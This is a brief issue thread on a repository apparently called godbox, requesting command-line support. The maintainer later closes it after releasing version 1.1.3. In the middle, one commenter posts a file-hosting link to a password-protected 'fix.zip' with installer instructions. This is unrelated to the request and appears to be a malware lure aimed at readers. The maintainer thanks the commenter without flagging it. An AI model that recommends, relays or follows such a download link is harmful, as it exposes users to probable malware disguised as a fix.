### ISSUE TITLE
CLI Support

### ISSUE THREAD

**Issue by john1234brown** [john1234brown/godbox#1]
- Needs CLI running Support!
- Offer Command line interface options to spin up a godBox without needing an additional file to start one up!

**Comment by Gaurav9812** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by john1234brown** [comment]
Problem Closed
Version 1.1.3 Released
All though thank you @Gaurav9812  for your attempts to help I did get it solved on my own!
